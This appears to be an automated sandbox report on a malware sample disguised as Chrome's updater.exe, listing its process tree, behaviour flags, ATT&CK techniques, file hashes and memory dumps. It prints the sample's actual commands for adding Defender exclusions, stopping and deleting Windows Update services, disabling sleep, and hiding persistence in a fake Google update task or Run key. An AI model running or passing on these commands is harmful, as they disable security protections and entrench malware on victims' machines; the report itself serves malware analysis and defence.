powershell <#vxyhz#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskMachineQC" } Else { "C:\Program Files\Google\Chrome\updater.exe" }
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4408

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskMachineQC
3⤵
PID:1684

C:\Program Files\Google\Chrome\updater.exe
"C:\Program Files\Google\Chrome\updater.exe"
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Drops file in Drivers directory
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:4204

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:852

C:\Windows\system32\cmd.exe
cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
2⤵
- Suspicious use of WriteProcessMemory
PID:2376

C:\Windows\system32\sc.exe
sc stop UsoSvc
3⤵
- Launches sc.exe
PID:4620

C:\Windows\system32\sc.exe
sc stop WaaSMedicSvc
3⤵
- Launches sc.exe
PID:4868

C:\Windows\system32\sc.exe
sc stop wuauserv
3⤵
- Launches sc.exe
PID:540

C:\Windows\system32\sc.exe
sc stop bits
3⤵
- Launches sc.exe
PID:204

C:\Windows\system32\sc.exe
sc stop dosvc
3⤵
- Launches sc.exe
PID:1200

C:\Windows\system32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
3⤵
PID:4896

C:\Windows\system32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
3⤵
PID:1572

C:\Windows\system32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
3⤵
PID:5012

C:\Windows\system32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
3⤵
PID:1328

C:\Windows\system32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
3⤵
PID:1680

C:\Windows\system32\cmd.exe
cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
2⤵
- Suspicious use of WriteProcessMemory
PID:3680

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
3⤵
PID:3208

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
3⤵
PID:2524

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-ac 0
3⤵
PID:2348

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-dc 0
3⤵
PID:228

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell <#eaoqkxx#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:1808

C:\Windows\system32\conhost.exe
C:\Windows\system32\conhost.exe wygzabxfbktab
2⤵
PID:4848

C:\Windows\system32\cmd.exe
cmd /c mkdir "C:\Program Files\Google\Libs\" & wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
3⤵
- Drops file in Program Files directory
PID:3708

C:\Windows\System32\Wbem\WMIC.exe
wmic PATH Win32_VideoController GET Name, VideoProcessor
4⤵
PID:4900

C:\Windows\system32\cmd.exe
cmd /c mkdir "C:\Program Files\Google\Libs\" & wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
2⤵
- Drops file in Program Files directory
PID:1168

C:\Windows\system32\conhost.exe
C:\Windows\system32\conhost.exe yluxxonfmsqtfwpr GoySvqjslEz2cJjLp/l+rjzn6ce4jALjhSdARaKlIdOzscb8uSA4DC45OD1DpPEqiKy9RognxgdgL26xl6pHcgBuSDH82m22H2uTx/gYzO827+5kpstbfmCCWwx/haNMZTpvRN2AWJn3nj807NkQH/uc5YsiTBf742xyjDXcUT/RYfnhcLyzybIWgXn+7JafUmbaP5sh35EaxsiGFShuRY1L5Fi1uvVZnjU0an3bePXHEXYChHiocVdekR4gVKAc85wY8WomQkvNXfo8OnI8G68t0jyGDhrkDKs7kWaJz2DMj5MokwVvSUi2Y2TsrAP/8HOYVji2aTn31s7dz3/WlCN+UmM7HFUgStV0krKswFnOvNVFJHtjMrdLvilnrbVN4TalQD/4emuEzW66JneW1htkUt/8aAdr6yQCo+wN61IVXg3oZHUHUUBFwXWKf1by
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:1996

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe start wuauserv
1⤵
- Launches sc.exe
PID:4540

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Modify Existing Service

T1031

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Virtualization/Sandbox Evasion

T1497

Impair Defenses

T1562

Credential Access

Discovery

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files\Google\Chrome\updater.exe
Filesize
7.1MB

MD5
b47a5db99257e5746288f2e91f5d856f

SHA1
51117d33f41ffcf408f97eba2bcfcb861081e6bb

SHA256
50912cba2af4b843a1787258bb1d5bd33186458215689c3dfe42e71cfb60044f

SHA512
ba1d1175573e4bac3d355c6532f0ab1effb3f8b907935e460bc1a435d20ee547284093031c03edc4650fdcc67d6db00a940810d4fd6485b5e150d6e8ea354148

Download Submit
C:\Program Files\Google\Chrome\updater.exe
Filesize
7.1MB

MD5
b47a5db99257e5746288f2e91f5d856f

SHA1
51117d33f41ffcf408f97eba2bcfcb861081e6bb

SHA256
50912cba2af4b843a1787258bb1d5bd33186458215689c3dfe42e71cfb60044f

SHA512
ba1d1175573e4bac3d355c6532f0ab1effb3f8b907935e460bc1a435d20ee547284093031c03edc4650fdcc67d6db00a940810d4fd6485b5e150d6e8ea354148

Download Submit
C:\Program Files\Google\Libs\g.log
Filesize
226B

MD5
fdba80d4081c28c65e32fff246dc46cb

SHA1
74f809dedd1fc46a3a63ac9904c80f0b817b3686

SHA256
b9a385645ec2edddbc88b01e6b21362c14e9d7895712e67d375874eb7308e398

SHA512
b24a6784443c85bb56f8ae401ad4553c0955f587671ec7960bda737901d677d5e15d1a47d3674505fc98ea09ede2e5078a0aeb4481d3728e6715f3eac557cd29

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
944B

MD5
d28a889fd956d5cb3accfbaf1143eb6f

SHA1
157ba54b365341f8ff06707d996b3635da8446f7

SHA256
21e5d7ccf80a293e6ba30ed728846ca19c929c52b96e2c8d34e27cd2234f1d45

SHA512
0b6d88deb9be85722e6a78d5886d49f2caf407a59e128d2b4ed74c1356f9928c40048a62731959f2460e9ff9d9feee311043d2a37abe3bb92c2b76a44281478c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
91eb06ae19582718b44e49635bc514d4

SHA1
c123fd1acaa9cbed7c3ce34524c12ddfcc618393

SHA256
48f9609cad0a2583580de89c04ad2f0daf7864da6ef6cb8d3fa1dabe650d042e

SHA512
2580a01fdc1291d590a504b8d9967b18272ad0d57690ce936dea5aeb76ce24a626df1d92cf5ddb11c375b9d93e1acb97511b38373eb369828427a9f39a8c8280

Download Submit
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize
4KB

MD5
bdb25c22d14ec917e30faf353826c5de

SHA1
6c2feb9cea9237bc28842ebf2fea68b3bd7ad190

SHA256
e3274ce8296f2cd20e3189576fbadbfa0f1817cdf313487945c80e968589a495

SHA512
b5eddbfd4748298a302e2963cfd12d849130b6dcb8f0f85a2a623caed0ff9bd88f4ec726f646dbebfca4964adc35f882ec205113920cb546cc08193739d6728c

Download Submit
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
b42c70c1dbf0d1d477ec86902db9e986

SHA1
1d1c0a670748b3d10bee8272e5d67a4fabefd31f

SHA256
8ed3b348989cdc967d1fc0e887b2a2f5a656680d8d14ebd3cb71a10c2f55867a

SHA512
57fb278a8b2e83d01fac2a031c90e0e2bd5e4c1a360cfa4308490eb07e1b9d265b1f28399d0f10b141a6438ba92dd5f9ce4f18530ec277fece0eb7678041cbc5

Download Submit
C:\Windows\system32\drivers\etc\hosts
Filesize
2KB

MD5
f3d22211f9d35e3e451d8805977596b5

SHA1
871e0c78feebed66d67ef256765d9bd3d789c439

SHA256
a8ab115102233211a7ebe016d473a9eff5bc1b49e884282726e76fdca7ba6b01

SHA512
0f8c9aa04aa0d016ece0dfce9f0f71e23107f0a54384a3c06126393e90be533fbf9897ff65defce13bca5725fd036cb1ba8cf8661f6db4d2af91d7061ed4fd09

Download Submit
memory/204-209-0x0000000000000000-mapping.dmp

Download
memory/228-210-0x0000000000000000-mapping.dmp

Download
memory/540-206-0x0000000000000000-mapping.dmp

Download
memory/852-188-0x0000022950CE0000-0x0000022950CFC000-memory.dmp

Filesize
112KB

Download
memory/852-185-0x00007FFAE4750000-0x00007FFAE5211000-memory.dmp

Filesize
10.8MB

Download
memory/852-189-0x00007FFAE4750000-0x00007FFAE5211000-memory.dmp

Filesize
10.8MB

Download
memory/852-186-0x0000022950860000-0x000002295087C000-memory.dmp

Filesize
112KB

Download
memory/852-191-0x0000022950D20000-0x0000022950D3A000-memory.dmp

Filesize
104KB

Download
memory/852-190-0x0000022950CC0000-0x0000022950CCA000-memory.dmp

Filesize
40KB

Download
memory/852-192-0x0000022950CD0000-0x0000022950CD8000-memory.dmp

Filesize
32KB

Download
memory/852-193-0x0000022950D00000-0x0000022950D06000-memory.dmp

Filesize
24KB

Download
memory/852-187-0x0000022950650000-0x000002295065A000-memory.dmp

Filesize
40KB

Download
memory/852-194-0x0000022950D10000-0x0000022950D1A000-memory.dmp

Filesize
40KB

Download
memory/852-184-0x0000000000000000-mapping.dmp

Download
memory/852-195-0x00007FFAE4750000-0x00007FFAE5211000-memory.dmp

Filesize
10.8MB

Download
memory/1008-152-0x0000000000000000-mapping.dmp

Download
memory/1040-155-0x0000000000000000-mapping.dmp

Download
memory/1168-221-0x0000000000000000-mapping.dmp

Download
memory/1200-211-0x0000000000000000-mapping.dmp

Download
memory/1328-215-0x0000000000000000-mapping.dmp

Download
memory/1572-213-0x0000000000000000-mapping.dmp

Download
memory/1680-216-0x0000000000000000-mapping.dmp

Download
memory/1684-172-0x0000000000000000-mapping.dmp

Download
memory/1808-218-0x000001AF08EA9000-0x000001AF08EAF000-memory.dmp

Filesize
24KB

Download
memory/1808-217-0x00007FFAE4750000-0x00007FFAE5211000-memory.dmp

Filesize
10.8MB

Download
memory/1808-199-0x0000000000000000-mapping.dmp

Download
memory/1808-207-0x00007FFAE4750000-0x00007FFAE5211000-memory.dmp

Filesize
10.8MB

Download
memory/1880-158-0x0000000000000000-mapping.dmp

Download
memory/1996-223-0x00007FF6BE2425D0-mapping.dmp

Download
memory/1996-225-0x00000295EFC60000-0x00000295EFC80000-memory.dmp

Filesize
128KB

Download
memory/1996-227-0x00007FF6BDA50000-0x00007FF6BE244000-memory.dmp

Filesize
8.0MB

Download
memory/1996-230-0x00007FF6BDA50000-0x00007FF6BE244000-memory.dmp

Filesize
8.0MB

Download
memory/2216-156-0x0000000000000000-mapping.dmp

Download
memory/2236-154-0x0000000000000000-mapping.dmp

Download
memory/2344-151-0x0000000000000000-mapping.dmp

Download
memory/2348-208-0x0000000000000000-mapping.dmp

Download
memory/2376-196-0x0000000000000000-mapping.dmp

Download
memory/2524-204-0x0000000000000000-mapping.dmp

Download
memory/2880-157-0x0000000000000000-mapping.dmp

Download
memory/3068-140-0x00007FF634C40000-0x00007FF635940000-memory.dmp

Filesize
13.0MB

Download
memory/3068-141-0x00007FFB028F0000-0x00007FFB02AE5000-memory.dmp

Filesize
2.0MB

Download
memory/3068-133-0x00007FF634C40000-0x00007FF635940000-memory.dmp

Filesize
13.0MB

Download
memory/3068-135-0x00007FFB028F0000-0x00007FFB02AE5000-memory.dmp

Filesize
2.0MB

Download
memory/3068-136-0x00007FF634C40000-0x00007FF635940000-memory.dmp

Filesize
13.0MB

Download
memory/3068-137-0x00007FF634C40000-0x00007FF635940000-memory.dmp

Filesize
13.0MB

Download
memory/3068-132-0x00007FF634C40000-0x00007FF635940000-memory.dmp

Filesize
13.0MB

Download
memory/3068-138-0x00007FF634C40000-0x00007FF635940000-memory.dmp

Filesize
13.0MB

Download
memory/3068-134-0x00007FF634C40000-0x00007FF635940000-memory.dmp

Filesize
13.0MB

Download
memory/3068-139-0x00007FF634C40000-0x00007FF635940000-memory.dmp

Filesize
13.0MB

Download
memory/3068-169-0x00007FFB028F0000-0x00007FFB02AE5000-memory.dmp

Filesize
2.0MB

Download
memory/3068-168-0x00007FF634C40000-0x00007FF635940000-memory.dmp

Filesize
13.0MB

Download
memory/3092-166-0x00007FFAE3640000-0x00007FFAE4101000-memory.dmp

Filesize
10.8MB

Download
memory/3092-160-0x00007FFAE3640000-0x00007FFAE4101000-memory.dmp

Filesize
10.8MB

Download
memory/3092-148-0x0000000000000000-mapping.dmp

Download
memory/3148-159-0x0000000000000000-mapping.dmp

Download
memory/3208-202-0x0000000000000000-mapping.dmp

Download
memory/3680-197-0x0000000000000000-mapping.dmp

Download
memory/3708-220-0x0000000000000000-mapping.dmp

Download
memory/3780-163-0x0000000000000000-mapping.dmp

Download
memory/4044-146-0x0000000000000000-mapping.dmp

Download
memory/4052-142-0x0000000000000000-mapping.dmp

Download
memory/4052-143-0x0000025732FD0000-0x0000025732FF2000-memory.dmp

Filesize
136KB

Download
memory/4052-144-0x00007FFAE3640000-0x00007FFAE4101000-memory.dmp

Filesize
10.8MB

Download
memory/4052-145-0x00007FFAE3640000-0x00007FFAE4101000-memory.dmp

Filesize
10.8MB

Download
memory/4100-165-0x0000000000000000-mapping.dmp

Download
memory/4204-224-0x00007FFB028F0000-0x00007FFB02AE5000-memory.dmp

Filesize
2.0MB

Download
memory/4204-176-0x00007FFB028F0000-0x00007FFB02AE5000-memory.dmp

Filesize
2.0MB

Download
memory/4204-179-0x00007FF6EDDE0000-0x00007FF6EEAE0000-memory.dmp

Filesize
13.0MB

Download
memory/4204-182-0x00007FFB028F0000-0x00007FFB02AE5000-memory.dmp

Filesize
2.0MB

Download
memory/4204-180-0x00007FF6EDDE0000-0x00007FF6EEAE0000-memory.dmp

Filesize
13.0MB

Download
memory/4204-183-0x00007FF6EDDE0000-0x00007FF6EEAE0000-memory.dmp

Filesize
13.0MB

Download
memory/4204-178-0x00007FF6EDDE0000-0x00007FF6EEAE0000-memory.dmp

Filesize
13.0MB

Download
memory/4204-226-0x00007FF6EDDE0000-0x00007FF6EEAE0000-memory.dmp

Filesize
13.0MB

Download
memory/4204-177-0x00007FF6EDDE0000-0x00007FF6EEAE0000-memory.dmp

Filesize
13.0MB

Download
memory/4204-175-0x00007FF6EDDE0000-0x00007FF6EEAE0000-memory.dmp

Filesize
13.0MB

Download
memory/4204-181-0x00007FF6EDDE0000-0x00007FF6EEAE0000-memory.dmp

Filesize
13.0MB

Download
memory/4408-170-0x00007FFAE4750000-0x00007FFAE5211000-memory.dmp

Filesize
10.8MB

Download
memory/4408-167-0x0000000000000000-mapping.dmp

Download
memory/4408-174-0x00007FFAE4750000-0x00007FFAE5211000-memory.dmp

Filesize
10.8MB

Download
memory/4532-147-0x0000000000000000-mapping.dmp

Download
memory/4620-200-0x0000000000000000-mapping.dmp

Download
memory/4664-164-0x0000000000000000-mapping.dmp

Download
memory/4716-162-0x0000000000000000-mapping.dmp

Download
memory/4848-219-0x00007FF6A69114E0-mapping.dmp

Download
memory/4868-203-0x0000000000000000-mapping.dmp

Download
memory/4896-212-0x0000000000000000-mapping.dmp

Download
memory/4900-222-0x0000000000000000-mapping.dmp

Download
memory/4988-150-0x0000000000000000-mapping.dmp

Download
memory/5012-214-0x0000000000000000-mapping.dmp

Download
memory/5044-161-0x0000000000000000-mapping.dmp

Download